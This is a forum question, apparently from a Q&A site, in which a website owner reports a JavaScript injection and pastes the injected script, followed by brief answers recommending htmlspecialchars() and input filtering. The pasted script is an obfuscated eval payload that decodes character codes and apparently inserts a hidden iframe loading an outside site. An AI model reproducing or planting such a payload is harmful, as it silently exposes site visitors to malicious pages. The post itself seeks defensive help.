Reputation: 46
javascript injection attack
Our website has been attacked. It looks the javascript below were injected to the site. certain browsers (mozilla, etc.) prints "Reported Attack Page!" when page is visited.
Does anyone have an idea how to find the security leak and prevent?
Thanks
<script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=
['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f5 9f68f74f73f24f79f42f55f61f36f55f67f59f-2f
-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-
10f81f-29f-33f-335f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f
74f70f16f5f5f73f62f69f57f65f63f68f61f72f55 f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61 f63f21f12f-3f-10f77f63
f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16
f62f63f58f58f59f 68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75 f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20
f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-
1f81f5-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f 66f59f67f59f68f74f
-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5
f73f62f69f57f65f63f68f61f72f55 f74f59f73f4f57f69f67f5f67f63f68f58f5f63f68f4f57f61 f63f21f12f-3f-1f17f60f4f73f74f79f
66f59f4f76f63f73f63f56f63f66f63 f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68 f19f-
3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-
3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f
63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66
f59f67f 59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f6
0f-1f17f-29f-33f-33f83']
[0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}
catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;585!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}
if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>
Upvotes: 2
Views: 1059
Answers (3)
Reputation: 5108
Basically you need to use the function htmlspecialchars() whenever you want to output something to the browser that came from the user input.
Something like this.
echo htmlspecialchars($string, ENT_QUOTES, 'UTF-8');
Upvotes: 1
Reputation: 3062
As far as I know injection attacks happen when ever you allow people to insert code in your website, by means of a comment or in principle input fields which are not processed in order to avoid this kind of situations. So it is something that should be in your database.
Upvotes: 0
Reputation: 9692
You should use htmlspecialchars() and filter out all POST (and GET for that matter) at ALL times to prevent such XSS attacks.
Upvotes: 1
Related Questions
- Preventing JavaScript Injections in a PHP Web Application
- js injection disturbed all my code
- Preventing JavaScript Injection
- Javascript Injected in browser
- Attempted JS injection in form on website? - alert('TK00000025')
- Javascript security problem
- JavaScript being injected in my PHP Pages
- Php & code injection
- Showing PHP variable in Javascript - Security point
- PHP Security and XSS attacks - Getting Error Refused to execute a JavaScript script. Source code of script found within request